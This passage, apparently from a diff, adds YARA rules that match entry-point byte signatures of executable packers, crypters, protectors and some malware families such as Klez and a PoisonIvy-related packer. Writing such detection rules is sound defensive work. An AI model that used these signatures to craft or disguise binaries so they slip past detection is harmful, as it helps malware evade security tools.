+		$a0 = { 3B ?? 74 02 81 83 55 3B ?? 74 02 81 ?? 53 3B ?? 74 01 ?? ?? ?? ?? ?? 02 81 ?? ?? E8 ?? ?? ?? ?? 3B 74 01 ?? 5D 8B D5 81 ED }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxInvoluntary1349
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? B9 ?? ?? 8C DD ?? 8C C8 ?? 8E D8 8E C0 33 F6 8B FE FC ?? ?? AD ?? 33 C2 AB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinZip32bit6x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 15 FC 81 40 00 B1 22 38 08 74 02 B1 20 40 80 38 00 74 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV36LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02LCCWin321xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECrypt10ReBirth
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 60 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 4E 28 40 00 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy11NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 0C 3C 40 00 E8 24 FC FF FF 6A 00 68 28 3A 40 00 6A 0A 6A 00 E8 D8 FC FF FF E8 7F F5 FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEcryptbyarchphase
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 E0 53 56 33 C0 89 45 E4 89 45 E0 89 45 EC ?? ?? ?? ?? 64 82 40 00 E8 7C C7 FF FF 33 C0 55 68 BE 84 40 00 64 FF 30 64 89 20 68 CC 84 40 00 ?? ?? ?? ?? 00 A1 10 A7 40 00 50 E8 1D C8 FF FF 8B D8 85 DB 75 39 E8 3A C8 FF FF 6A 00 6A 00 68 A0 A9 40 00 68 00 04 00 00 50 6A 00 68 00 13 00 00 E8 FF C7 FF FF 6A 00 68 E0 84 40 00 A1 A0 A9 40 00 50 6A 00 E8 ?? ?? ?? ?? E9 7D 01 00 00 53 A1 10 A7 40 00 50 E8 42 C8 FF FF 8B F0 85 F6 75 18 6A 00 68 E0 84 40 00 68 E4 84 40 00 6A 00 E8 71 C8 FF FF E9 53 01 00 00 53 6A 00 E8 2C C8 FF FF A3 ?? ?? ?? ?? 83 3D 48 A8 40 00 00 75 18 6A 00 68 E0 84 40 00 68 F8 84 40 00 6A 00 E8 43 C8 FF FF E9 25 01 00 00 56 E8 F8 C7 FF FF A3 4C A8 40 00 A1 48 A8 40 00 E8 91 A1 FF FF 8B D8 8B 15 48 A8 40 00 85 D2 7C 16 42 33 C0 8B 0D 4C A8 40 00 03 C8 8A 09 8D 34 18 88 0E 40 4A 75 ED 8B 15 48 A8 40 00 85 D2 7C 32 42 33 C0 8D 34 18 8A 0E 80 F9 01 75 05 C6 06 FF EB 1C 8D 0C 18 8A 09 84 ?? ?? ?? ?? ?? 00 EB 0E 8B 0D 4C A8 40 00 03 C8 0F B6 09 49 88 0E 40 4A 75 D1 8D ?? ?? ?? ?? E8 A5 A3 FF FF 8B 45 E8 8D 55 EC E8 56 D5 FF FF 8D 45 EC BA 18 85 40 00 E8 79 BA FF FF 8B 45 EC E8 39 BB FF FF 8B D0 B8 54 A8 40 00 E8 31 A6 FF FF BA 01 00 00 00 B8 54 A8 40 00 E8 12 A9 FF FF E8 DD A1 FF FF 68 50 A8 40 00 8B D3 8B 0D 48 A8 40 00 B8 54 A8 40 00 E8 56 A7 FF FF E8 C1 A1 FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv30xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LameCryptLaZaRus
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPack29NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100LZBRSBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC AD 8D 1C 07 B0 80 3B FB 73 3B E8 ?? ?? ?? ?? 72 03 A4 EB F2 E8 ?? ?? ?? ?? 8D 51 FF E8 ?? ?? ?? ?? 56 8B F7 2B F2 F3 A4 5E EB DB 02 C0 75 03 AC 12 C0 C3 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB }
+	$a1 = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VIRUSIWormKLEZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 D2 40 ?? 68 04 AC 40 ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 BC D0 }
+
+condition:
+		$a0
+}
+	
+	
+rule YZPack12UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02LocklessIntroPackAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2C E8 EB 1A 90 90 5D 8B C5 81 ED F6 73 90 90 2B 85 90 90 90 90 83 E8 06 89 85 FF 01 EC AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITE3211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv20bartxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 87 25 ?? ?? ?? 00 61 94 55 A4 B6 80 FF 13 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeSVKP111emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMASM32TASM32MicrosoftVisualBasic
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor239DLLminimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 51 68 ?? ?? ?? ?? 87 2C 24 8B CD 5D 81 E1 ?? ?? ?? ?? E9 ?? ?? ?? 00 89 45 F8 51 68 ?? ?? ?? ?? 59 81 F1 ?? ?? ?? ?? 0B 0D ?? ?? ?? ?? 81 E9 ?? ?? ?? ?? E9 ?? ?? ?? 00 81 C2 ?? ?? ?? ?? E8 ?? ?? ?? 00 87 0C 24 59 51 64 8B 05 30 00 00 00 8B 40 0C 8B 40 0C E9 ?? ?? ?? 00 F7 D6 2B D5 E9 ?? ?? ?? 00 87 3C 24 8B CF 5F 87 14 24 1B CA E9 ?? ?? ?? 00 83 C4 08 68 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? 00 E9 ?? ?? ?? 00 50 8B C5 87 04 24 8B EC 51 0F 88 ?? ?? ?? 00 FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 99 03 04 24 E9 ?? ?? ?? 00 C3 81 D5 ?? ?? ?? ?? 9C E9 ?? ?? ?? 00 81 FA ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 15 81 CB ?? ?? ?? ?? 81 F3 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Frusionbiff
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 55 56 57 68 04 01 00 00 C7 44 24 14 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule OpenSourceCodeCrypterp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 09 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 34 44 40 00 E8 28 F8 FF FF 33 C0 55 68 9F 47 40 00 64 FF 30 64 89 20 BA B0 47 40 00 B8 1C 67 40 00 E8 07 FD FF FF 8B D8 85 DB 75 07 6A 00 E8 C2 F8 FF FF BA 28 67 40 00 8B C3 8B 0D 1C 67 40 00 E8 F0 E0 FF FF BE 01 00 00 00 B8 2C 68 40 00 E8 E1 F0 FF FF BF 0A 00 00 00 8D 55 EC 8B C6 E8 92 FC FF FF 8B 4D EC B8 2C 68 40 00 BA BC 47 40 00 E8 54 F2 FF FF A1 2C 68 40 00 E8 52 F3 FF FF 8B D0 B8 20 67 40 00 E8 A2 FC FF FF 8B D8 85 DB 0F 84 52 02 00 00 B8 24 67 40 00 8B 15 20 67 40 00 E8 78 F4 FF FF B8 24 67 40 00 E8 7A F3 FF FF 8B D0 8B C3 8B 0D 20 67 40 00 E8 77 E0 FF FF 8D 55 E8 A1 24 67 40 00 E8 42 FD FF FF 8B 55 E8 B8 24 67 40 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule QrYPt0rbyNuTraL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 F9 00 0F 84 8D 01 00 00 8A C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 32 C1 3C F3 75 89 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? BA D9 04 00 00 E8 00 00 00 00 5F 81 C7 16 01 00 00 80 2C 3A 01 }
+	$a1 = { 86 18 CC 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 BB 00 00 F7 BF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B8 78 56 34 12 87 03 E8 CD FE FF FF E8 B3 }
+	$a2 = { EB 00 E8 B5 00 00 00 E9 2E 01 00 00 64 FF 35 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 64 89 25 00 00 00 00 8B 44 24 04 }
+
+condition:
+		$a0 or $a1 or $a2 at pe.entry_point
+}
+	
+	
+rule EXECryptor2xxmaxcompressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC FC 53 57 56 89 45 FC 89 55 F8 89 C6 89 D7 66 81 3E 4A 43 0F 85 23 01 00 00 83 C6 0A C7 45 F4 08 00 00 00 31 DB BA 00 00 00 80 43 31 C0 E8 11 01 00 00 73 0E 8B 4D F0 E8 1F 01 00 00 02 45 EF AA EB E9 E8 FC 00 00 00 0F 82 97 00 00 00 E8 F1 00 00 00 73 5B B9 04 00 00 00 E8 FD 00 00 00 48 74 DE 0F 89 C7 00 00 00 E8 D7 00 00 00 73 1B 55 BD 00 01 00 00 E8 D7 00 00 00 88 07 47 4D 75 F5 E8 BF 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 C8 00 00 00 83 C0 07 89 45 F0 C6 45 EF 00 83 F8 08 74 89 E8 A9 00 00 00 88 45 EF E9 7C FF FF FF B9 07 00 00 00 E8 A2 00 00 00 50 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upackv024v028AlphaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD ?? ?? 95 AD 91 F3 A5 AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded24222428Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D 9B 1A 00 00 B9 84 1A 00 00 BA 14 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD E0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SVKProtectorv1051
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 03 C7 84 E8 EB 03 C7 84 9A E8 00 00 00 00 5D 81 ED 10 00 00 00 EB 03 C7 84 E9 64 A0 23 00 00 00 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeZCode101FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E9 FB FF FF FF C3 68 00 00 00 00 64 FF 35 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 8B 35 70 01 40 ?? 83 EE 40 6A 40 68 ?? 30 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ProgramProtectorXPv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 58 83 D8 05 89 C3 81 C3 ?? ?? ?? ?? 8B 43 64 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack111Method2NTbagieTMX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 89 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032aemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 }
+	$a1 = { EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 }
+	$a2 = { E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 81 83 C4 04 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 3D FF FF FF 00 EB 01 68 EB 02 CD 20 EB 01 E8 76 1B EB 01 68 EB 02 CD 20 EB 01 E8 CC 66 B8 FE 00 74 04 75 02 EB 02 EB 01 81 66 E7 64 74 04 75 02 EB 02 EB 01 81 E8 0A 00 00 00 E8 EB 0C }
+
+condition:
+		$a0 or $a1 or $a2 at pe.entry_point
+}
+	
+	
+rule VxHafen1641
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 01 ?? ?? ?? CE CC 25 ?? ?? 25 ?? ?? 25 ?? ?? 40 51 D4 ?? ?? ?? CC 47 CA ?? ?? 46 8A CC 44 88 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NativeUDPacker11ModdedPoisonIvyShellcodeokkixot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 C0 31 DB 31 C9 EB 0E 6A 00 6A 00 6A 00 6A 00 FF 15 28 41 40 00 FF 15 94 40 40 00 89 C7 68 88 13 00 00 FF 15 98 40 40 00 FF 15 94 40 40 00 81 C7 88 13 00 00 39 F8 73 05 E9 84 00 00 00 6A 40 68 00 10 00 00 FF 35 04 30 40 00 6A 00 FF 15 A4 40 40 00 89 C7 FF 35 04 30 40 00 68 CA 10 40 00 50 FF 15 A8 40 40 00 6A 40 68 00 10 00 00 FF 35 08 30 40 00 6A 00 FF 15 A4 40 40 00 89 C6 68 00 30 40 00 FF 35 04 30 40 00 57 FF 35 08 30 40 00 50 6A 02 FF 15 4E 41 40 00 6A 00 6A 00 6A 00 56 6A 00 6A 00 FF 15 9C 40 40 00 50 6A 00 6A 00 6A 11 50 FF 15 4A 41 40 00 58 6A FF 50 FF 15 AC 40 40 00 6A 00 FF 15 A0 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2xxcompressedresources
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 57 53 31 DB 89 C6 89 D7 0F B6 06 89 C2 83 E0 1F C1 EA 05 74 2D 4A 74 15 8D 5C 13 02 46 C1 E0 08 89 FA 0F B6 0E 46 29 CA 4A 29 C2 EB 32 C1 E3 05 8D 5C 03 04 46 89 FA 0F B7 0E 29 CA 4A 83 C6 02 EB 1D C1 E3 04 46 89 C1 83 E1 0F 01 CB C1 E8 05 73 07 43 89 F2 01 DE EB 06 85 DB 74 0E EB A9 56 89 D6 89 D9 F3 A4 31 DB 5E EB 9D 89 F0 5B 5F 5E C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule NXPEPackerv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF 60 FF CA FF 00 BA DC 0D E0 40 00 50 00 60 00 70 00 80 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PolyBoxCAnskya
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 E4 41 00 10 E8 3A E1 FF FF 33 C0 55 68 11 44 00 10 64 FF 30 64 89 20 EB 08 FC FC FC FC FC FC 27 54 6A 0A 68 20 44 00 10 A1 1C 71 00 10 50 E8 CC E1 ?? ?? ?? ?? 85 DB 0F 84 77 01 00 00 53 A1 1C 71 00 10 50 E8 1E E2 FF FF 8B F0 85 F6 0F 84 61 01 00 00 53 A1 1C 71 00 10 50 E8 E0 E1 FF FF 85 C0 0F 84 4D 01 00 00 50 E8 DA E1 FF FF 8B D8 85 DB 0F 84 3D 01 00 00 56 B8 70 80 00 10 B9 01 00 00 00 8B 15 98 41 00 10 E8 9E DE FF FF 83 C4 04 A1 70 80 00 10 8B CE 8B D3 E8 E1 E1 FF FF 6A 00 6A 00 A1 70 80 00 10 B9 30 44 00 10 8B D6 E8 F8 FD FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule UPolyXv05
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC ?? 00 BD 46 00 8B ?? B9 ?? 00 00 00 80 ?? ?? 51 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a1 = { 83 EC 04 89 14 24 59 BA ?? 00 00 00 52 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 }
+	$a2 = { BB 00 BD 46 00 83 EC 04 89 1C 24 ?? B9 ?? 00 00 00 80 33 ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a3 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 83 EC 04 89 ?? 24 B9 ?? 00 00 00 81 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a4 = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 ?? 00 BD 46 00 ?? B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+	$a5 = { EB 01 C3 ?? 00 BD 46 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 or $a1 or $a2 or $a3 or $a4 or $a5
+}
+	
+	
+rule beriav007publicWIPsymbiont
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 18 53 8B 1D 00 30 ?? ?? 55 56 57 68 30 07 00 00 33 ED 55 FF D3 8B F0 3B F5 74 0D 89 AE 20 07 00 00 E8 88 0F 00 00 EB 02 33 F6 6A 10 55 89 35 30 40 ?? ?? FF D3 8B F0 3B F5 74 09 89 2E E8 3C FE FF FF EB 02 33 F6 6A 18 55 89 35 D8 43 ?? ?? FF D3 8B F0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCGuardv405dv410dv415d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule asscrypterbysantasdad
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 98 40 00 10 E8 AC EA FF FF 33 C0 55 68 78 51 00 10 64 ?? ?? ?? ?? 20 6A 0A 68 88 51 00 10 A1 E0 97 00 10 50 E8 D8 EA FF FF 8B D8 53 A1 E0 97 00 10 50 E8 12 EB FF FF 8B F8 53 A1 E0 97 00 10 50 E8 DC EA FF FF 8B D8 53 E8 DC EA FF FF 8B F0 85 F6 74 26 8B D7 4A B8 F0 97 00 10 E8 C9 E7 FF FF B8 F0 97 00 10 E8 B7 E7 FF FF 8B CF 8B D6 E8 EE EA FF FF 53 E8 98 EA FF FF 8D 4D EC BA 9C 51 00 10 A1 F0 97 00 10 E8 22 EB FF FF 8B 55 EC B8 F0 97 00 10 E8 89 E6 FF FF B8 F0 97 00 10 E8 7F E7 FF FF E8 6E EC FF FF 33 C0 5A 59 59 64 89 10 68 7F 51 00 10 8D 45 EC E8 11 E6 FF FF C3 E9 FF DF FF FF EB F0 5F 5E 5B E8 0D E5 FF FF 00 53 45 54 54 49 4E 47 53 00 00 00 00 FF FF FF FF 1C 00 00 00 45 4E 54 45 52 20 59 4F 55 52 20 4F 57 4E 20 50 41 53 53 57 4F 52 44 20 48 45 52 45 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CopyControlv303
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { CC 90 90 EB 0B 01 50 51 52 53 54 61 33 61 2D 35 CA D1 07 52 D1 A1 3C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110Engbartxt
+{
+      meta:
+		author="malware-lu"
+strings:
